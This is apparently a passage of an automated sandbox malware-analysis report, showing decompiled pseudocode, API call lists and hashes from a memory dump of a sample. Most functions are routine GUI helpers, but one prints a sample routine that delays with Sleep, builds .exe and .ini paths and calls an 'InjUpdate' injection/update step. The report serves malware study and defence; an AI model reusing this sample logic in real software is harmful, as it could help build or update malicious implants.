                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00000000,00000000,00000000,00CC0020,00CC0020,00000000,00000000,00000000,00CC0020,00000000,00000026,00000000), ref: 004752DD
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$B380DesktopRect
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2454875651-0
                                                                                                                                                                                                                            • Opcode ID: 94de3cdaf569bc05093e076c07835454fccb335de717688e3b24cf6573941b2d
                                                                                                                                                                                                                            • Instruction ID: cf87fae2104b332fff4ea17414f726447bb42f5c33e6fb1eed0e3625bbc1caf8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 94de3cdaf569bc05093e076c07835454fccb335de717688e3b24cf6573941b2d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 222162317442016FD311FA79CC86F5E77989F89314F50453DFA48EB2C2CA79AC0587AA
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 26%
                                                                                                                                                                                                                            			E004265A0(void* __ebx) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				char _v1000;
                                                                                                                                                                                                                            				char _v1004;
                                                                                                                                                                                                                            				char _v1032;
                                                                                                                                                                                                                            				signed int _v1034;
                                                                                                                                                                                                                            				short _v1036;
                                                                                                                                                                                                                            				void* _t24;
                                                                                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                                                                                            				intOrPtr _t27;
                                                                                                                                                                                                                            				intOrPtr _t29;
                                                                                                                                                                                                                            				intOrPtr _t45;
                                                                                                                                                                                                                            				intOrPtr _t52;
                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                            				void* _t55;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t54 = _t55;
                                                                                                                                                                                                                            				_v1036 = 0x300;
                                                                                                                                                                                                                            				_v1034 = 0x10;
                                                                                                                                                                                                                            				_t25 = E004029DC(_t24, 0x40,  &_v1032);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L00407638();
                                                                                                                                                                                                                            				_v8 = _t25;
                                                                                                                                                                                                                            				_push(_t54);
                                                                                                                                                                                                                            				_push(0x42669d);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t55 + 0xfffffbf8;
                                                                                                                                                                                                                            				_push(0x68);
                                                                                                                                                                                                                            				_t27 = _v8;
                                                                                                                                                                                                                            				_push(_t27);
                                                                                                                                                                                                                            				L00407380();
                                                                                                                                                                                                                            				_t45 = _t27;
                                                                                                                                                                                                                            				if(_t45 >= 0x10) {
                                                                                                                                                                                                                            					_push( &_v1032);
                                                                                                                                                                                                                            					_push(8);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(_v8);
                                                                                                                                                                                                                            					L004073C0();
                                                                                                                                                                                                                            					if(_v1004 != 0xc0c0c0) {
                                                                                                                                                                                                                            						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x424);
                                                                                                                                                                                                                            						_push(8);
                                                                                                                                                                                                                            						_push(_t45 - 8);
                                                                                                                                                                                                                            						_push(_v8);
                                                                                                                                                                                                                            						L004073C0();
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_push( &_v1004);
                                                                                                                                                                                                                            						_push(1);
                                                                                                                                                                                                                            						_push(_t45 - 8);
                                                                                                                                                                                                                            						_push(_v8);
                                                                                                                                                                                                                            						L004073C0();
                                                                                                                                                                                                                            						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x420);
                                                                                                                                                                                                                            						_push(7);
                                                                                                                                                                                                                            						_push(_t45 - 7);
                                                                                                                                                                                                                            						_push(_v8);
                                                                                                                                                                                                                            						L004073C0();
                                                                                                                                                                                                                            						_push( &_v1000);
                                                                                                                                                                                                                            						_push(1);
                                                                                                                                                                                                                            						_push(7);
                                                                                                                                                                                                                            						_push(_v8);
                                                                                                                                                                                                                            						L004073C0();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t52);
                                                                                                                                                                                                                            				 *[fs:eax] = _t52;
                                                                                                                                                                                                                            				_push(0x4266a4);
                                                                                                                                                                                                                            				_t29 = _v8;
                                                                                                                                                                                                                            				_push(_t29);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L00407888();
                                                                                                                                                                                                                            				return _t29;
                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 004265CE
                                                                                                                                                                                                                            • 73C9AD70.GDI32(?,00000068,00000000,0042669D,?,00000000), ref: 004265EA
                                                                                                                                                                                                                            • 73C9AEF0.GDI32(?,00000000,00000008,?,?,00000068,00000000,0042669D,?,00000000), ref: 00426609
                                                                                                                                                                                                                            • 73C9AEF0.GDI32(?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,0042669D,?,00000000), ref: 0042662D
                                                                                                                                                                                                                            • 73C9AEF0.GDI32(?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,0042669D), ref: 0042664B
                                                                                                                                                                                                                            • 73C9AEF0.GDI32(?,00000007,00000001,?,?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?), ref: 0042665F
                                                                                                                                                                                                                            • 73C9AEF0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0042669D,?,00000000), ref: 0042667F
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,?,004266A4,0042669D,?,00000000), ref: 00426697
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B380
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 120756276-0
                                                                                                                                                                                                                            • Opcode ID: 0eb73cb19fcbebc97ca0d3b42b0b75fc3d023da046d704aae5c56db498695ba3
                                                                                                                                                                                                                            • Instruction ID: 805600ea143b9581a1e299db5fe5220b0691e616ed58bf122693d2d560596f25
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0eb73cb19fcbebc97ca0d3b42b0b75fc3d023da046d704aae5c56db498695ba3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 592174B1A04218FAEB10DBA5CD85F9E72ACEB08704F5104A6FB04F61C1D678AE54DB29
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                            			E00434530(struct HDC__* __eax, void* __edx, void* __ebp, void* __eflags) {
                                                                                                                                                                                                                            				struct tagTEXTMETRICA _v112;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                            				char* _t18;
                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                            				struct HDC__* _t27;
                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                            				signed int _t30;
                                                                                                                                                                                                                            				signed int _t31;
                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                            				struct HDC__* _t38;
                                                                                                                                                                                                                            				struct tagTEXTMETRICA* _t40;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t40 =  &_v112;
                                                                                                                                                                                                                            				_t38 = __eax;
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L00407638();
                                                                                                                                                                                                                            				_t27 = __eax;
                                                                                                                                                                                                                            				GetTextMetricsA(__eax, _t40);
                                                                                                                                                                                                                            				_t14 = SelectObject(_t27, E00424E24( *((intOrPtr*)(_t38 + 0x68)), _t27, _t32));
                                                                                                                                                                                                                            				GetTextMetricsA(_t27,  &(_v112.tmMaxCharWidth));
                                                                                                                                                                                                                            				SelectObject(_t27, _t14);
                                                                                                                                                                                                                            				_push(_t27);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L00407888();
                                                                                                                                                                                                                            				_t18 =  *0x49da40; // 0x49eb1c
                                                                                                                                                                                                                            				if( *_t18 == 0) {
                                                                                                                                                                                                                            					_t28 = _t40->tmHeight;
                                                                                                                                                                                                                            					_t19 = _v112.tmHeight;
                                                                                                                                                                                                                            					if(_t28 > _t19) {
                                                                                                                                                                                                                            						_t28 = _t19;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t21 = GetSystemMetrics(6) << 2;
                                                                                                                                                                                                                            					if(_t28 < 0) {
                                                                                                                                                                                                                            						_t28 = _t28 + 3;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t30 = _t21 + (_t28 >> 2);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if( *((char*)(_t38 + 0x1a5)) == 0) {
                                                                                                                                                                                                                            						_t31 = 6;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t31 = 8;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t30 = GetSystemMetrics(6) * _t31;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return E0043A75C(_t38, _v112 + _t30);
                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 0043453A
                                                                                                                                                                                                                            • GetTextMetricsA.GDI32(00000000), ref: 00434543
                                                                                                                                                                                                                              • Part of subcall function 00424E24: CreateFontIndirectA.GDI32(?), ref: 00424F62
                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00434552
                                                                                                                                                                                                                            • GetTextMetricsA.GDI32(00000000,?), ref: 0043455F
                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00434566
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043456E
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 00434594
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 004345AE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Metrics$ObjectSelectSystemText$B380CreateFontIndirect
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3751190600-0
                                                                                                                                                                                                                            • Opcode ID: ca349bb18a4b4453b776530d288914abec228c4fb22e44048b16066f4dcf4a7d
                                                                                                                                                                                                                            • Instruction ID: 5c0f3d8754ac9f53a552d955726f62212e9f387cfb0fc4aa99143b90913ccd9a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca349bb18a4b4453b776530d288914abec228c4fb22e44048b16066f4dcf4a7d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2111A951F083003BE31066798CC2B6B65C8DB99358F84183AF646D73D2D57CBC41836B
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                            			E00497CF0(intOrPtr* __ebx, void* __edx, void* __edi, intOrPtr __esi, void* __fp0) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				char _v21;
                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                            				char _v40;
                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                            				char _v56;
                                                                                                                                                                                                                            				char _v60;
                                                                                                                                                                                                                            				char _v64;
                                                                                                                                                                                                                            				char _v68;
                                                                                                                                                                                                                            				char _v72;
                                                                                                                                                                                                                            				char _v76;
                                                                                                                                                                                                                            				char _v80;
                                                                                                                                                                                                                            				char _v84;
                                                                                                                                                                                                                            				void* _t84;
                                                                                                                                                                                                                            				intOrPtr _t88;
                                                                                                                                                                                                                            				void* _t91;
                                                                                                                                                                                                                            				intOrPtr _t92;
                                                                                                                                                                                                                            				void* _t96;
                                                                                                                                                                                                                            				intOrPtr _t100;
                                                                                                                                                                                                                            				intOrPtr _t105;
                                                                                                                                                                                                                            				intOrPtr _t112;
                                                                                                                                                                                                                            				char _t113;
                                                                                                                                                                                                                            				intOrPtr _t119;
                                                                                                                                                                                                                            				intOrPtr _t121;
                                                                                                                                                                                                                            				char _t122;
                                                                                                                                                                                                                            				void* _t129;
                                                                                                                                                                                                                            				intOrPtr _t172;
                                                                                                                                                                                                                            				void* _t173;
                                                                                                                                                                                                                            				intOrPtr _t174;
                                                                                                                                                                                                                            				intOrPtr _t176;
                                                                                                                                                                                                                            				intOrPtr _t178;
                                                                                                                                                                                                                            				void* _t185;
                                                                                                                                                                                                                            				char _t192;
                                                                                                                                                                                                                            				void* _t193;
                                                                                                                                                                                                                            				void* _t210;
                                                                                                                                                                                                                            				intOrPtr _t224;
                                                                                                                                                                                                                            				intOrPtr _t227;
                                                                                                                                                                                                                            				intOrPtr _t231;
                                                                                                                                                                                                                            				intOrPtr _t232;
                                                                                                                                                                                                                            				intOrPtr _t233;
                                                                                                                                                                                                                            				intOrPtr _t234;
                                                                                                                                                                                                                            				intOrPtr _t237;
                                                                                                                                                                                                                            				intOrPtr _t238;
                                                                                                                                                                                                                            				intOrPtr _t239;
                                                                                                                                                                                                                            				intOrPtr _t243;
                                                                                                                                                                                                                            				intOrPtr _t244;
                                                                                                                                                                                                                            				intOrPtr _t249;
                                                                                                                                                                                                                            				intOrPtr _t252;
                                                                                                                                                                                                                            				intOrPtr _t255;
                                                                                                                                                                                                                            				intOrPtr _t258;
                                                                                                                                                                                                                            				intOrPtr _t261;
                                                                                                                                                                                                                            				intOrPtr _t265;
                                                                                                                                                                                                                            				intOrPtr _t273;
                                                                                                                                                                                                                            				intOrPtr _t274;
                                                                                                                                                                                                                            				void* _t281;
                                                                                                                                                                                                                            				void* _t291;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t291 = __fp0;
                                                                                                                                                                                                                            				_t267 = __esi;
                                                                                                                                                                                                                            				_t266 = __edi;
                                                                                                                                                                                                                            				_t191 = __ebx;
                                                                                                                                                                                                                            				_t273 = _t274;
                                                                                                                                                                                                                            				_t193 = 0xa;
                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_t193 = _t193 - 1;
                                                                                                                                                                                                                            				} while (_t193 != 0);
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                                                                            				_push(_t273);
                                                                                                                                                                                                                            				_push(0x49814b);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t274;
                                                                                                                                                                                                                            				Sleep(0xea60);
                                                                                                                                                                                                                            				E004737B0( &_v28);
                                                                                                                                                                                                                            				_push(_v28);
                                                                                                                                                                                                                            				_push(0x498164);
                                                                                                                                                                                                                            				E00472D44(9, __ebx, _t193,  &_v32, __esi);
                                                                                                                                                                                                                            				_push(_v32);
                                                                                                                                                                                                                            				_push(".exe");
                                                                                                                                                                                                                            				E00404D40();
                                                                                                                                                                                                                            				E004737B0( &_v36);
                                                                                                                                                                                                                            				_push(_v36);
                                                                                                                                                                                                                            				_push(0x498164);
                                                                                                                                                                                                                            				E00472D44(7, __ebx, _t193,  &_v40, __esi);
                                                                                                                                                                                                                            				_push(_v40);
                                                                                                                                                                                                                            				_push(".ini");
                                                                                                                                                                                                                            				E00404D40();
                                                                                                                                                                                                                            				_v21 = 0;
                                                                                                                                                                                                                            				if(E00474D34(_t193) == 0) {
                                                                                                                                                                                                                            					L44:
                                                                                                                                                                                                                            					_pop(_t224);
                                                                                                                                                                                                                            					 *[fs:eax] = _t224;
                                                                                                                                                                                                                            					_push(0x498152);
                                                                                                                                                                                                                            					E004049E4( &_v84, 0xf);
                                                                                                                                                                                                                            					E004049C0( &_v20);
                                                                                                                                                                                                                            					return E004049E4( &_v12, 2);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_v16 = 1;
                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                            						_t84 = _v16 - 1;
                                                                                                                                                                                                                            						if(_t84 == 0) {
                                                                                                                                                                                                                            							_t227 =  *0x49f174; // 0x0
                                                                                                                                                                                                                            							E00404A58( &_v20, _t227);
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t185 = _t84 - 1;
                                                                                                                                                                                                                            							if(_t185 == 0) {
                                                                                                                                                                                                                            								_t232 =  *0x49f174; // 0x0
                                                                                                                                                                                                                            								E00404A58( &_v20, _t232);
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								if(_t185 == 1) {
                                                                                                                                                                                                                            									_t233 =  *0x49f174; // 0x0
                                                                                                                                                                                                                            									E00404A58( &_v20, _t233);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_push(_t273);
                                                                                                                                                                                                                            						_push(0x497f86);
                                                                                                                                                                                                                            						_push( *[fs:eax]);
                                                                                                                                                                                                                            						 *[fs:eax] = _t274;
                                                                                                                                                                                                                            						_t88 =  *0x49f13c; // 0x2212354
                                                                                                                                                                                                                            						E004967D4(_t88, _t191, 0x498190);
                                                                                                                                                                                                                            						_t91 = E00474D50(_v20, _t191, _v8, _t267);
                                                                                                                                                                                                                            						_t280 = _t91;
                                                                                                                                                                                                                            						if(_t91 != 0) {
                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t92 =  *0x49f13c; // 0x2212354
                                                                                                                                                                                                                            						E004967D4(_t92, _t191, 0x4981ec);
                                                                                                                                                                                                                            						_pop(_t231);
                                                                                                                                                                                                                            						 *[fs:eax] = _t231;
                                                                                                                                                                                                                            						_v16 = _v16 + 1;
                                                                                                                                                                                                                            						__eflags = _v16 - 4;
                                                                                                                                                                                                                            						if(_v16 != 4) {
                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							L18:
                                                                                                                                                                                                                            							if(_v21 == 0) {
                                                                                                                                                                                                                            								goto L44;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_v16 = 1;
                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                            								_t96 = _v16 - 1;
                                                                                                                                                                                                                            								if(_t96 == 0) {
                                                                                                                                                                                                                            									_t234 =  *0x49f168; // 0x0
                                                                                                                                                                                                                            									E00404A58( &_v20, _t234);
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_t129 = _t96 - 1;
                                                                                                                                                                                                                            									if(_t129 == 0) {
                                                                                                                                                                                                                            										_t238 =  *0x49f16c; // 0x0
                                                                                                                                                                                                                            										E00404A58( &_v20, _t238);
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										if(_t129 == 1) {
                                                                                                                                                                                                                            											_t239 =  *0x49f170; // 0x0
                                                                                                                                                                                                                            											E00404A58( &_v20, _t239);
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_push(_t273);
                                                                                                                                                                                                                            								_push(0x498104);
                                                                                                                                                                                                                            								_push( *[fs:eax]);
                                                                                                                                                                                                                            								 *[fs:eax] = _t274;
                                                                                                                                                                                                                            								_t100 =  *0x49f13c; // 0x2212354
                                                                                                                                                                                                                            								E004967D4(_t100, _t191, 0x49820c);
                                                                                                                                                                                                                            								if(E00474D50(_v20, _t191, _v12, _t267) != 0) {
                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_pop(_t237);
                                                                                                                                                                                                                            								_pop(_t210);
                                                                                                                                                                                                                            								 *[fs:eax] = _t237;
                                                                                                                                                                                                                            								_v16 = _v16 + 1;
                                                                                                                                                                                                                            								__eflags = _v16 - 4;
                                                                                                                                                                                                                            								if(_v16 != 4) {
                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									goto L44;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t105 =  *0x49f13c; // 0x2212354
                                                                                                                                                                                                                            							E0049A3E0(_t105, _t191, 0, _t266, _t267, _t291);
                                                                                                                                                                                                                            							if( *0x49f148 == 0) {
                                                                                                                                                                                                                            								__eflags =  *0x49f149;
                                                                                                                                                                                                                            								if(__eflags == 0) {
                                                                                                                                                                                                                            									_t192 = 0;
                                                                                                                                                                                                                            									__eflags = 0;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_t192 = 1;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t192 = 1;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_push(_t273);
                                                                                                                                                                                                                            							_push(0x4980e6);
                                                                                                                                                                                                                            							_push( *[fs:eax]);
                                                                                                                                                                                                                            							 *[fs:eax] = _t274;
                                                                                                                                                                                                                            							E00472EF0( &_v84, _t192, _t210, 0);
                                                                                                                                                                                                                            							E00404DCC(_v84, 0x498230);
                                                                                                                                                                                                                            							if(0 == 0) {
                                                                                                                                                                                                                            								_t112 =  *0x49f1dc; // 0x0
                                                                                                                                                                                                                            								_t113 = E00473490(_t112, _t192, "InjUpdate", _v12, __eflags, 0, 0);
                                                                                                                                                                                                                            								__eflags = _t113;
                                                                                                                                                                                                                            								if(_t113 != 0) {
                                                                                                                                                                                                                            									E0045A800();
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t119 =  *0x49f1dc; // 0x0
                                                                                                                                                                                                                            								if(E00473490(_t119, _t192, "InjUpdate", _v12, 0, 0, _t192) == 0) {
                                                                                                                                                                                                                            									_t121 =  *0x49f1dc; // 0x0
                                                                                                                                                                                                                            									_t122 = E00473490(_t121, _t192, "InjUpdate", _v12, __eflags, 0, 0);
                                                                                                                                                                                                                            									__eflags = _t122;
                                                                                                                                                                                                                            									if(_t122 != 0) {
                                                                                                                                                                                                                            										E0045A800();
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									E0045A800();
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_pop(_t243);
                                                                                                                                                                                                                            							 *[fs:eax] = _t243;
                                                                                                                                                                                                                            							_pop(_t244);
                                                                                                                                                                                                                            							 *[fs:eax] = _t244;
                                                                                                                                                                                                                            							goto L44;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t191 = E00430158(_v8, 1);
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_t191))( &_v48, 0);
                                                                                                                                                                                                                            					_t249 =  *0x49f1c8; // 0x0
                                                                                                                                                                                                                            					E004758E8(_v48, _t191,  &_v44, _t249);
                                                                                                                                                                                                                            					E00404A14(0x49f1c8, _v44);
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_t191))( &_v56, 0);
                                                                                                                                                                                                                            					_t252 =  *0x49f15c; // 0x0
                                                                                                                                                                                                                            					E004758E8(_v56, _t191,  &_v52, _t252);
                                                                                                                                                                                                                            					E00404A14(0x49f15c, _v52);
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_t191))( &_v64, 0);
                                                                                                                                                                                                                            					_t255 =  *0x49f168; // 0x0
                                                                                                                                                                                                                            					E004758E8(_v64, _t191,  &_v60, _t255);
                                                                                                                                                                                                                            					E00404A14(0x49f168, _v60);
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_t191))( &_v72, 0);
                                                                                                                                                                                                                            					_t258 =  *0x49f16c; // 0x0
                                                                                                                                                                                                                            					E004758E8(_v72, _t191,  &_v68, _t258);
                                                                                                                                                                                                                            					E00404A14(0x49f168, _v68);
                                                                                                                                                                                                                            					_t267 =  *_t191;
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_t191))( &_v80, 0);
                                                                                                                                                                                                                            					_t261 =  *0x49f170; // 0x0
                                                                                                                                                                                                                            					E004758E8(_v80, _t191,  &_v76, _t261);
                                                                                                                                                                                                                            					E00404A14(0x49f168, _v76);
                                                                                                                                                                                                                            					_t172 =  *0x49f15c; // 0x0
                                                                                                                                                                                                                            					_t173 = E00409628(_t172, _t273, _t280);
                                                                                                                                                                                                                            					_t174 =  *0x49f140; // 0x0
                                                                                                                                                                                                                            					E004957B4(_t174, _t173);
                                                                                                                                                                                                                            					_t176 =  *0x49f1c8; // 0x0
                                                                                                                                                                                                                            					_t281 = E00409628(_t176, _t273, _t280) -  *0x49f14c; // 0x6a
                                                                                                                                                                                                                            					if(_t281 <= 0) {
                                                                                                                                                                                                                            						_t178 =  *0x49f13c; // 0x2212354
                                                                                                                                                                                                                            						E004967D4(_t178, _t191, 0x4981ec);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_v21 = 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E00403BEC(_t191);
                                                                                                                                                                                                                            					E00409BAC(_v8);
                                                                                                                                                                                                                            					_pop(_t265);
                                                                                                                                                                                                                            					_pop(_t210);
                                                                                                                                                                                                                            					 *[fs:eax] = _t265;
                                                                                                                                                                                                                            					goto L18;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}


































































                                                                                                                                                                                                                            0x00497dea
                                                                                                                                                                                                                            0x00497df5
                                                                                                                                                                                                                            0x00497dfa
                                                                                                                                                                                                                            0x00497dfc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00497f72
                                                                                                                                                                                                                            0x00497f77
                                                                                                                                                                                                                            0x00497f7e
                                                                                                                                                                                                                            0x00497f81
                                                                                                                                                                                                                            0x00497f90
                                                                                                                                                                                                                            0x00497f93
                                                                                                                                                                                                                            0x00497f97
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00497f9d
                                                                                                                                                                                                                            0x00497f9d
                                                                                                                                                                                                                            0x00497fa1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00497fa7
                                                                                                                                                                                                                            0x00497fae
                                                                                                                                                                                                                            0x00497fb1
                                                                                                                                                                                                                            0x00497fb2
                                                                                                                                                                                                                            0x00497fbf
                                                                                                                                                                                                                            0x00497fc5
                                                                                                                                                                                                                            0x00497fb4
                                                                                                                                                                                                                            0x00497fb4
                                                                                                                                                                                                                            0x00497fb5
                                                                                                                                                                                                                            0x00497fcf
                                                                                                                                                                                                                            0x00497fd5
                                                                                                                                                                                                                            0x00497fb7
                                                                                                                                                                                                                            0x00497fb8
                                                                                                                                                                                                                            0x00497fdf
                                                                                                                                                                                                                            0x00497fe5
                                                                                                                                                                                                                            0x00497fe5
                                                                                                                                                                                                                            0x00497fb8
                                                                                                                                                                                                                            0x00497fb5
                                                                                                                                                                                                                            0x00497fec
                                                                                                                                                                                                                            0x00497fed
